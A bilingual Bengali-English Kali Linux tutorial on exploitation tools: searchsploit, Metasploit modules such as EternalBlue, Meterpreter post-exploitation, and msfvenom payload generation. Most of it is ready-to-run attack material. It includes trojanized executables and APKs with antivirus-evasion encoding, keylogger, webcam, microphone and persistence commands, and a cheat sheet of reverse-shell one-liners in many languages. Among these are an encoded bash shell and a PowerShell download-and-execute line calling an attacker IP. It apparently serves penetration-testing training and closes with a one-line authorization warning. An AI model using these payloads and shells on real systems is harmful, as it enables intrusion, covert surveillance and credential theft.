Kali Linux Series — Part 3: Exploitation Tools

CHAPTER 01

🔎 Searchsploit — Exploit Database CLIExploit Database CLI

Exploit-DB-এর offline copy — internet ছাড়াই exploit খোঁজো ও use করোOffline copy of Exploit-DB — search and use exploits without internet

🔎

searchsploit

Exploit-DB-এর command line interface — software name বা CVE দিয়ে locally exploit খোঁজোCommand line interface for Exploit-DB — search exploits locally by software name or CVE

Exploit Search Offline DB

🔍 Search CommandsSearch Commands

Flag / Command	কাজFunction	উদাহরণExample
searchsploit [keyword]	Keyword দিয়ে exploit খোঁজোSearch exploits by keyword	searchsploit apache 2.4
searchsploit [soft] [ver]	Software নাম ও version দিয়ে খোঁজোSearch by software name and version	searchsploit wordpress 5.8
-t keyword	শুধু Title-এ search করো (precise result)Search in title only (precise results)	searchsploit -t "remote code execution"
--cve CVE-XXXX	CVE number দিয়ে exploit খোঁজোSearch by CVE number	searchsploit --cve CVE-2021-44228
-e keyword	Exact phrase match করোExact phrase match	searchsploit -e "Apache 2.4.49"
--exclude "word"	নির্দিষ্ট keyword বাদ দিয়ে খোঁজোExclude specific keyword from results	searchsploit apache --exclude "windows"
-w	Exploit-DB website URL দেখাওShow Exploit-DB website URLs	searchsploit -w apache 2.4
-j	JSON format-এ output দেখাওShow output in JSON format	searchsploit -j apache \| python3 -m json.tool
--nmap file.xml	Nmap XML scan result থেকে exploit খোঁজোSearch exploits from Nmap XML scan results	searchsploit --nmap scan.xml

📋 Exploit File OperationsExploit File Operations

Flag	কাজFunction	উদাহরণExample
-p EDB-ID	Exploit-এর full path দেখাওShow full path of exploit	searchsploit -p 42966
-m EDB-ID	Exploit বর্তমান directory-তে copy করোCopy exploit to current directory	searchsploit -m 42966
-x EDB-ID	Exploit file directly examine/read করোDirectly examine/read exploit file	searchsploit -x 42966
--update	Exploit database update করোUpdate exploit database	searchsploit --update

# Apache-এর সব exploit খোঁজো root@kali:~# searchsploit apache 2.4 # Nmap scan result থেকে সরাসরি exploit খোঁজো root@kali:~# searchsploit --nmap nmap_scan.xml # CVE দিয়ে Log4Shell exploit খোঁজো root@kali:~# searchsploit --cve CVE-2021-44228 # Exploit copy করো ও দেখো root@kali:~# searchsploit -m 42966 root@kali:~# cat 42966.py # Windows exclude করে Linux exploit খোঁজো root@kali:~# searchsploit samba --exclude "windows" # Database update করো root@kali:~# searchsploit --update

CHAPTER 02

💥 Metasploit Framework — সম্পূর্ণ গাইডComplete Guide

World-এর সবচেয়ে জনপ্রিয় penetration testing framework — exploit থেকে post-exploitation সব এক জায়গায়World's most popular penetration testing framework — exploits to post-exploitation all in one place

💥

Metasploit Framework

Rapid7-এর তৈরি open-source exploit framework — ২০০০+ exploit, ৫০০+ payload, ৩০০+ auxiliary module আছেOpen-source exploit framework by Rapid7 — 2000+ exploits, 500+ payloads, 300+ auxiliary modules

Exploit Payload Post-Exploit AV Evasion

🚀 MSFconsole চালু করা ও Basic NavigationLaunching MSFconsole & Basic Navigation

# Database initialize করো (প্রথমবার) root@kali:~# msfdb init # MSFconsole চালু করো root@kali:~# msfconsole # Quiet mode (banner ছাড়া) root@kali:~# msfconsole -q # Resource file চালাও (automation) root@kali:~# msfconsole -r commands.rc

⌨️ MSFconsole — সব Basic CommandsMSFconsole — All Basic Commands

কমান্ডCommand	কাজFunction	উদাহরণExample
help	সব available command দেখাওShow all available commands	help
help [command]	নির্দিষ্ট command-এর help দেখাওShow help for specific command	help search
search [keyword]	Module খোঁজো — name, CVE, author দিয়েSearch modules by name, CVE, author	search eternalblue
search type:exploit	শুধু exploit module খোঁজোSearch only exploit modules	search type:exploit platform:windows
search cve:2021	CVE year দিয়ে খোঁজোSearch by CVE year	search cve:2021 type:exploit
use [module]	Module select করোSelect a module	use exploit/windows/smb/ms17_010_eternalblue
use [number]	Search result-এর number দিয়ে module select করোSelect module by search result number	use 0
info	Current module-এর বিস্তারিত তথ্য দেখাওShow detailed info about current module	info
show options	Module-এর configurable options দেখাওShow module's configurable options	show options
show advanced	Advanced options দেখাওShow advanced options	show advanced
show payloads	Compatible payloads দেখাওShow compatible payloads	show payloads
show targets	Available exploit targets দেখাওShow available exploit targets	show targets
set [OPTION] [value]	Option-এর value সেট করোSet value for an option	set RHOSTS 192.168.1.5
setg [OPTION] [value]	Global value সেট করো (সব module-এ কাজ করবে)Set global value (applies to all modules)	setg LHOST 192.168.1.100
unset [OPTION]	Option-এর value clear করোClear an option's value	unset RHOSTS
run / exploit	Exploit চালাওRun the exploit	run
run -j	Background-এ job হিসেবে চালাওRun as background job	run -j
check	Target vulnerable কিনা check করো (exploit না করে)Check if target is vulnerable (without exploiting)	check
back	Current module থেকে বেরিয়ে আসোExit current module	back
exit / quit	Metasploit বন্ধ করোExit Metasploit	exit
sessions	সব active session দেখাওShow all active sessions	sessions
sessions -i [id]	নির্দিষ্ট session-এ interact করোInteract with specific session	sessions -i 1
sessions -k [id]	নির্দিষ্ট session kill করোKill a specific session	sessions -k 1
sessions -l	সব session list করোList all sessions	sessions -l
jobs	Background jobs দেখাওShow background jobs	jobs
kill [job_id]	Background job kill করোKill a background job	kill 0
background / Ctrl+Z	Current session background-এ পাঠাওSend current session to background	background
spool file.txt	Console output file-এ save করোSave console output to file	spool /tmp/msf_log.txt
makerc file.rc	Session-এর commands resource file-এ save করোSave session commands to resource file	makerc /tmp/commands.rc

🗄️ Database ও Workspace ManagementDatabase & Workspace Management

কমান্ডCommand	কাজFunction
db_status	Database connection status দেখাওShow database connection status
workspace	বর্তমান workspace দেখাওShow current workspace
workspace -a [name]	নতুন workspace তৈরি করোCreate new workspace
workspace [name]	Workspace switch করোSwitch to workspace
workspace -d [name]	Workspace delete করোDelete workspace
db_nmap [options] target	Nmap চালাও ও result database-এ save করোRun Nmap and save results to database
db_import scan.xml	External scan result import করো (Nmap XML)Import external scan results (Nmap XML)
hosts	Database-এ stored hosts দেখাওShow hosts stored in database
services	Discovered services দেখাওShow discovered services
vulns	Known vulnerabilities দেখাওShow known vulnerabilities
creds	Collected credentials দেখাওShow collected credentials
loot	Collected loot দেখাওShow collected loot
db_export -f xml output.xml	Database export করোExport database

🎯 Module Types — কোনটা কী কাজেরModule Types — What Each Does

💥 Exploit Module

Vulnerability exploit করে target system-এ access নেয়।Exploits vulnerability to gain access to target system.

msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(...) > set RHOSTS 192.168.1.5 msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(...) > set LHOST 192.168.1.100 msf6 exploit(...) > run

🔧 Auxiliary Module

Scanning, fuzzing, sniffing, brute force করে — exploit ছাড়া।Scanning, fuzzing, sniffing, brute force — without exploiting.

msf6 > use auxiliary/scanner/smb/smb_version msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(...) > set THREADS 50 msf6 auxiliary(...) > run

📦 Payload

Exploit-এর পরে target-এ execute হয়। Shell, Meterpreter ইত্যাদি।Executes on target after exploit. Shell, Meterpreter, etc.

# Staged payload (ছোট, internet দরকার) windows/x64/meterpreter/reverse_tcp # Stageless payload (বড়, standalone) windows/x64/meterpreter_reverse_tcp

🔄 Post Module

Session পাওয়ার পরে চালানো হয় — privilege escalation, data collection।Run after getting a session — privilege escalation, data collection.

msf6 > use post/multi/recon/local_exploit_suggester msf6 post(...) > set SESSION 1 msf6 post(...) > run

🔥 সবচেয়ে বেশি ব্যবহৃত ExploitsMost Used Exploits

Module Path	CVE	Target	বিবরণDescription
`exploit/windows/smb/ms17_010_eternalblue`	CVE-2017-0144	Windows 7/2008	EternalBlue — NSA exploit, WannaCry-তে ব্যবহৃতEternalBlue — NSA exploit, used in WannaCry
`exploit/windows/smb/ms08_067_netapi`	MS08-067	Windows XP/2003	Classic Windows SMB exploitClassic Windows SMB exploit
`exploit/multi/handler`	—	Any	Reverse shell listener (সবচেয়ে বেশি ব্যবহৃত)Reverse shell listener (most used)
`exploit/unix/ftp/vsftpd_234_backdoor`	—	Linux	vsFTPd 2.3.4 backdoorvsFTPd 2.3.4 backdoor
`exploit/multi/samba/usermap_script`	CVE-2007-2447	Linux Samba	Samba usermap script injectionSamba usermap script injection
`exploit/windows/http/rejetto_hfs_exec`	CVE-2014-6287	HFS Windows	HTTP File Server RCEHTTP File Server RCE
`auxiliary/scanner/portscan/tcp`	—	Any	MSF দিয়ে TCP port scanTCP port scan with MSF
`auxiliary/scanner/smb/smb_login`	—	Windows	SMB login brute forceSMB login brute force
`auxiliary/scanner/http/http_login`	—	Web	HTTP form brute forceHTTP form brute force
`post/multi/recon/local_exploit_suggester`	—	Any	Local PrivEsc exploit suggest করোSuggest local PrivEsc exploits
`post/windows/gather/hashdump`	—	Windows	Windows password hash dump করোDump Windows password hashes
`post/linux/gather/hashdump`	—	Linux	Linux /etc/shadow dump করোDump Linux /etc/shadow

🧩 Multi/Handler — Reverse Shell ListenerMulti/Handler — Reverse Shell Listener

💡 Multi/Handler কী?What is Multi/Handler?

যখন তুমি msfvenom দিয়ে payload বানিয়ে target-এ execute করবে, তখন Metasploit-এ একটি listener চালাতে হবে যেটা connection গ্রহণ করবে। Multi/Handler সেই listener। When you create a payload with msfvenom and execute it on the target, you need a listener in Metasploit to receive the connection. Multi/Handler is that listener.

msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.1.100 # তোমার IP msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > set ExitOnSession false # একাধিক connection-এর জন্য msf6 exploit(multi/handler) > run -j # Background-এ চালাও # Target execute করার পরে session পাবে [*] Started reverse TCP handler on 192.168.1.100:4444 [*] Sending stage (175174 bytes) to 192.168.1.5 [*] Meterpreter session 1 opened # Session-এ ঢোকো msf6 > sessions -i 1

🔍 দরকারী Auxiliary ModulesUseful Auxiliary Modules

Module	কাজFunction
auxiliary/scanner/portscan/tcp	TCP port scan করোTCP port scan
auxiliary/scanner/smb/smb_version	SMB version detect করোDetect SMB version
auxiliary/scanner/smb/smb_login	SMB login brute force করোBrute force SMB login
auxiliary/scanner/ssh/ssh_login	SSH login brute force করোBrute force SSH login
auxiliary/scanner/ftp/ftp_login	FTP login brute force করোBrute force FTP login
auxiliary/scanner/http/http_version	Web server version detect করোDetect web server version
auxiliary/scanner/http/dir_scanner	Web directory scan করোScan web directories
auxiliary/scanner/vnc/vnc_login	VNC login brute force করোBrute force VNC login
auxiliary/gather/dns_enum	DNS enumeration করোDNS enumeration
auxiliary/sniffer/psnuffle	Network traffic sniff করোSniff network traffic

CHAPTER 03

🐚 Meterpreter — Advanced Post-Exploitation ShellAdvanced Post-Exploitation Shell

Exploit-এর পরে যে শক্তিশালী shell পাওয়া যায় — file system, network, system সব control করোThe powerful shell obtained after exploitation — control file system, network, and system

🐚

Meterpreter

Metasploit-এর in-memory payload — disk-এ কোনো file লেখে না, AV detect করতে পারে না সহজেMetasploit's in-memory payload — writes no files to disk, hard for AV to detect

Post-Exploit In-Memory Advanced Shell

💻 System CommandsSystem Commands

কমান্ডCommand	কাজFunction
sysinfo	System information দেখাও (OS, hostname, arch)Show system info (OS, hostname, arch)
getuid	বর্তমান user দেখাওShow current user
getpid	বর্তমান process ID দেখাওShow current process ID
ps	সব running process দেখাওShow all running processes
migrate [PID]	অন্য process-এ migrate করো (stability/evasion)Migrate to another process (stability/evasion)
kill [PID]	Process kill করোKill a process
shell	Regular OS shell-এ যাও (cmd.exe বা /bin/sh)Drop into regular OS shell (cmd.exe or /bin/sh)
execute -f cmd -i	Command execute করো interactive mode-এExecute command in interactive mode
reboot	Target system reboot করোReboot target system
shutdown	Target system shutdown করোShutdown target system
idletime	User কতক্ষণ idle আছে দেখাওShow how long user has been idle
env	Environment variables দেখাওShow environment variables

📁 File System CommandsFile System Commands

কমান্ডCommand	কাজFunction
pwd	বর্তমান directory দেখাও (target-এ)Show current directory (on target)
ls	Directory contents দেখাওList directory contents
cd [path]	Directory change করোChange directory
cat [file]	File content দেখাওShow file content
download [file]	Target থেকে file download করোDownload file from target
upload [file] [path]	Target-এ file upload করোUpload file to target
edit [file]	Target-এর file edit করোEdit file on target
rm [file]	File delete করোDelete file
mkdir [dir]	Directory তৈরি করোCreate directory
search -f *.txt	File খোঁজোSearch for files
search -f passwords.txt -d C:\\	C drive-এ password file খোঁজোSearch for password file on C drive
lpwd	Attacker machine-এর বর্তমান directoryCurrent directory on attacker machine
lcd [path]	Attacker machine-এ directory change করোChange directory on attacker machine

🌐 Network CommandsNetwork Commands

কমান্ডCommand	কাজFunction
ipconfig / ifconfig	Network interface ও IP দেখাওShow network interfaces and IPs
arp	ARP table দেখাওShow ARP table
route	Routing table দেখাওShow routing table
netstat	Active network connections দেখাওShow active network connections
portfwd add -l 8080 -p 80 -r target	Port forward করো (pivot করার জন্য)Set up port forwarding (for pivoting)
portfwd list	Port forward rules দেখাওList port forward rules
portfwd delete -l 8080	Port forward rule মুছোRemove port forward rule

⬆️ Privilege EscalationPrivilege Escalation

কমান্ডCommand	কাজFunction
getsystem	SYSTEM privilege পাওয়ার চেষ্টা করো (Windows)Attempt to gain SYSTEM privileges (Windows)
getprivs	বর্তমান privileges দেখাওShow current privileges
use post/multi/recon/local_exploit_suggester	Local PrivEsc exploits suggest করোSuggest local PrivEsc exploits
hashdump	Windows password hash dump করো (SYSTEM লাগে)Dump Windows password hashes (needs SYSTEM)
run post/windows/gather/hashdump	Post module দিয়ে hash dump করোDump hashes using post module
load incognito	Token impersonation extension load করোLoad token impersonation extension
list_tokens -u	Available tokens দেখাও (incognito)Show available tokens (incognito)
impersonate_token "DOMAIN\\Admin"	Admin token impersonate করোImpersonate admin token

📸 Surveillance CommandsSurveillance Commands

কমান্ডCommand	কাজFunction
screenshot	Target-এর screen screenshot নাওTake screenshot of target's screen
keyscan_start	Keylogger চালু করোStart keylogger
keyscan_dump	Logged keystrokes দেখাওShow logged keystrokes
keyscan_stop	Keylogger বন্ধ করোStop keylogger
webcam_list	Available webcam দেখাওList available webcams
webcam_snap	Webcam দিয়ে ছবি তোলোTake photo with webcam
webcam_stream	Webcam live stream দেখোView live webcam stream
record_mic -d 10	১০ সেকেন্ড microphone record করোRecord microphone for 10 seconds

🔒 PersistencePersistence

কমান্ডCommand	কাজFunction
run persistence -h	Persistence module help দেখাওShow persistence module help
run persistence -S -U -X -i 30 -p 4444 -r LHOST	Startup/User login-এ auto-connect করোAuto-connect on startup/user login
run post/windows/manage/persistence_exe	Windows persistence setup করোSet up Windows persistence
run post/linux/manage/cron_persistence	Linux cron দিয়ে persistence করোSet up Linux cron persistence

# EternalBlue exploit — সম্পূর্ণ workflow msf6 > search eternalblue msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.5 msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100 msf6 exploit(ms17_010_eternalblue) > set LPORT 4444 msf6 exploit(ms17_010_eternalblue) > run # Meterpreter session পেলে: meterpreter > sysinfo meterpreter > getuid meterpreter > getsystem # SYSTEM privilege নাও meterpreter > hashdump # Password hash dump করো meterpreter > screenshot # Screen capture করো meterpreter > download C:/secret.txt # File নামাও meterpreter > background # Background-এ পাঠাও # PrivEsc suggestion msf6 > use post/multi/recon/local_exploit_suggester msf6 post(...) > set SESSION 1 msf6 post(...) > run

CHAPTER 04

🧬 msfvenom — Payload Generator & EncoderPayload Generator & Encoder

Windows, Linux, Android, Web — যেকোনো platform-এর জন্য custom payload তৈরি করোCreate custom payloads for any platform — Windows, Linux, Android, Web

🧬

msfvenom

Metasploit payload generator ও encoder — msfpayload + msfencode একসাথেMetasploit payload generator and encoder — combines msfpayload + msfencode

Payload Gen AV Evasion Backdoor

⚙️ msfvenom — Core Flagsmsfvenom — Core Flags

Flag	কাজFunction	উদাহরণExample
-p payload	Payload specify করোSpecify payload	-p windows/x64/meterpreter/reverse_tcp
LHOST=IP	Attacker IP সেট করোSet attacker IP	LHOST=192.168.1.100
LPORT=port	Attacker listening port সেট করোSet attacker listening port	LPORT=4444
-f format	Output format specify করোSpecify output format	-f exe / -f elf / -f apk / -f raw
-o file	Output file নাম দাওSet output filename	-o payload.exe
-e encoder	Encoder ব্যবহার করো (AV bypass)Use encoder (AV bypass)	-e x86/shikata_ga_nai
-i count	Encoding iterations বাড়াওIncrease encoding iterations	-i 10
-b "\x00"	Bad characters avoid করোAvoid bad characters	-b "\x00\x0a\x0d"
-n bytes	NOP sled যোগ করোAdd NOP sled	-n 10
-x template	Legitimate exe-এর মধ্যে payload inject করোInject payload into legitimate exe	-x putty.exe
-k	Template exe-কে functional রাখো (-x এর সাথে)Keep template exe functional (with -x)	-k -x putty.exe
--list payloads	সব available payload দেখাওList all available payloads	msfvenom --list payloads
--list formats	সব output format দেখাওList all output formats	msfvenom --list formats
--list encoders	সব encoder দেখাওList all encoders	msfvenom --list encoders

🪟 Windows PayloadsWindows Payloads

# Windows 64-bit Meterpreter Reverse TCP (.exe) root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o win_payload.exe # Windows 32-bit Reverse Shell root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload32.exe # Encoded payload (AV bypass) root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x64/xor_dynamic -i 10 -f exe -o encoded.exe # Legitimate exe-এর মধ্যে payload inject করো root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -k -x putty.exe -f exe -o trojan_putty.exe # Windows PowerShell payload root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o payload.ps1 # DLL payload (DLL Hijacking) root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o payload.dll # Windows Bind Shell (target-এ port খুলে) root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=192.168.1.5 LPORT=4444 -f exe -o bind_shell.exe # ASP Web Shell (Windows IIS) root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp # ASPX Web Shell root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx -o shell.aspx

🐧 Linux PayloadsLinux Payloads

# Linux 64-bit Meterpreter Reverse TCP (ELF) root@kali:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o linux_payload root@kali:~# chmod +x linux_payload # Linux 32-bit Reverse Shell root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o linux32.elf # Linux Staged Meterpreter root@kali:~# msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf # PHP Web Shell (Linux web server) root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php # Python payload root@kali:~# msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py # Bash payload root@kali:~# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.sh

📱 Android PayloadAndroid Payload

# Android APK payload root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o android_payload.apk # Legitimate APK-এর মধ্যে inject করো root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -k -x original.apk -o trojan.apk # Listener চালাও root@kali:~# msfconsole -q -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"

🌐 Web PayloadsWeb Payloads

# PHP Meterpreter Web Shell root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php # JSP Web Shell (Java/Tomcat) root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.jsp # WAR file (Tomcat) root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war # Node.js payload root@kali:~# msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.js

📊 Staged vs Stageless PayloadStaged vs Stageless Payload

ধরনType	উদাহরণExample	বিবরণDescription	কখন ব্যবহারWhen to Use
Staged	`windows/x64/meterpreter/reverse_tcp`	ছোট payload — Metasploit থেকে বাকি অংশ download করেSmall payload — downloads rest from Metasploit	Normal network access আছেNormal network access
Stageless	`windows/x64/meterpreter_reverse_tcp`	বড় payload — সব কিছু ভেতরে আছে, download দরকার নেইLarge self-contained payload — no download needed	Restricted network বা AV evasionRestricted network or AV evasion

CHAPTER 05

📡 Reverse Shell — সব ধরনেরReverse Shells — All Types

Bash, Python, PHP, Netcat, PowerShell, Perl, Ruby — সব language-এ reverse shell one-linerReverse shell one-liners in every language — Bash, Python, PHP, Netcat, PowerShell, Perl, Ruby

⚠️ Reverse Shell কীভাবে কাজ করে?How Reverse Shell Works?

Target machine → Attacker-এ connect করে। Attacker-এ আগে nc -lvnp 4444 দিয়ে listener চালু রাখতে হবে। Target machine → connects back to attacker. Attacker must first run nc -lvnp 4444 to start a listener.

👂 Listener Setup — প্রথমে Attacker-এ চালাওListener Setup — Run First on Attacker

# Netcat listener (সবচেয়ে সহজ) root@kali:~# nc -lvnp 4444 # Multiple connection accept করার জন্য root@kali:~# nc -lkvnp 4444 # Rlwrap দিয়ে (arrow key কাজ করবে) root@kali:~# rlwrap nc -lvnp 4444 # Metasploit multi/handler listener msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell_reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.1.100 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > run

🐚 Bash Reverse ShellBash Reverse Shell

# Method 1 — Classic Bash bash -i >& /dev/tcp/192.168.1.100/4444 0>&1 # Method 2 — Bash with /dev/tcp 0<&196;exec 196<>/dev/tcp/192.168.1.100/4444; sh <&196 >&196 2>&196 # Method 3 — Background bash shell bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1' & # Method 4 — Encoded (filter bypass) echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==" | base64 -d | bash

🐍 Python Reverse ShellPython Reverse Shell

# Python 3 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' # Python 2 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' # Python short version python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.1.100",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

🐘 PHP Reverse ShellPHP Reverse Shell

# PHP one-liner php -r '$sock=fsockopen("192.168.1.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");' # PHP web shell (upload করো) <?php system($_GET['cmd']); ?> # PHP reverse shell (file হিসেবে upload করো) <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"); ?> # PentestMonkey-র full PHP reverse shell (recommended) # /usr/share/webshells/php/php-reverse-shell.php থেকে copy করো root@kali:~# cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php # LHOST ও LPORT edit করো, তারপর upload করো

📡 Netcat Reverse ShellNetcat Reverse Shell

# Traditional netcat (যদি -e থাকে) nc 192.168.1.100 4444 -e /bin/bash # Modern netcat (OpenBSD) — -e নেই rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.100 4444 >/tmp/f # Windows netcat nc.exe 192.168.1.100 4444 -e cmd.exe # ncat (nmap-এর netcat) ncat 192.168.1.100 4444 -e /bin/bash

🪟 PowerShell Reverse Shell (Windows)PowerShell Reverse Shell (Windows)

# PowerShell one-liner powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}" # Encoded PowerShell (bypass restriction) powershell -EncodedCommand [BASE64_ENCODED_COMMAND] # PowerShell download ও execute powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/shell.ps1')"

🔢 Perl, Ruby, Awk Reverse ShellPerl, Ruby, Awk Reverse Shell

# Perl perl -e 'use Socket;$i="192.168.1.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' # Ruby ruby -rsocket -e'f=TCPSocket.open("192.168.1.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' # Awk awk 'BEGIN {s = "/inet/tcp/0/192.168.1.100/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; print c; while ((c | getline line) > 0) print line | s; close(c)} while(c != "exit") close(s)}}' # Lua lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.1.100','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"

⬆️ Shell Upgrade — Dumb Shell → TTY ShellShell Upgrade — Dumb Shell → TTY Shell

✅ কেন Shell Upgrade করব?Why Upgrade Shell?

Simple reverse shell-এ arrow key কাজ করে না, Ctrl+C তে shell মরে যায়, sudo কাজ করে না। TTY upgrade করলে এসব সমস্যা দূর হয়। In simple reverse shells, arrow keys don't work, Ctrl+C kills the shell, sudo doesn't work. TTY upgrade solves all these problems.

═══ Method 1: Python PTY (সবচেয়ে সহজ) ═══ # Target-এ চালাও: python3 -c 'import pty; pty.spawn("/bin/bash")' # তারপর Ctrl+Z চাপো (background করো) # Attacker machine-এ: stty raw -echo; fg # Target-এ: export TERM=xterm stty rows 38 columns 120 ═══ Method 2: Script ব্যবহার করো ═══ script /dev/null -c bash ═══ Method 3: Socat (সবচেয়ে ভালো) ═══ # Attacker-এ listener: socat file:`tty`,raw,echo=0 tcp-listen:4444 # Target-এ: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.100:4444 ═══ Method 4: rlwrap (quick) ═══ # Listener চালানোর আগে: root@kali:~# rlwrap nc -lvnp 4444

💥 Exploitation Checklist — কাজের পদ্ধতিExploitation Checklist — Workflow

1️⃣ Recon: Nmap দিয়ে সব port ও service বের করো → searchsploit দিয়ে exploit খোঁজোRecon: Find all ports/services with Nmap → search exploits with searchsploit
2️⃣ Search: MSFconsole-এ search দিয়ে Metasploit module খোঁজোSearch: Find Metasploit module using search in MSFconsole
3️⃣ Configure: RHOSTS, PAYLOAD, LHOST, LPORT সেট করোConfigure: Set RHOSTS, PAYLOAD, LHOST, LPORT
4️⃣ Run: check করো তারপর run করোRun: First check then run
5️⃣ Shell: Reverse shell পেলে TTY upgrade করোShell: After getting shell, upgrade to TTY
6️⃣ PrivEsc: local_exploit_suggester চালাওPrivEsc: Run local_exploit_suggester
7️⃣ Post: Hashdump, screenshot, data collection করোPost: Hashdump, screenshot, data collection

💥 "Exploitation is not just about running tools — it's about understanding the target."

সব কিছু authorized environment-এ practice করো। Permission ছাড়া exploit করা সম্পূর্ণ illegal। Practice everything in authorized environments only. Exploiting without permission is completely illegal.

Kali Linux Series — Part 3 | v1.0 | Exploitation Tools

Part 4: Password Attacks + Wireless (Hashcat, John, Hydra, Aircrack-ng) →

Kali Linux — Part 3

Exploitation Tools — সম্পূর্ণ বাংলা গাইড Exploitation Tools — Complete Guide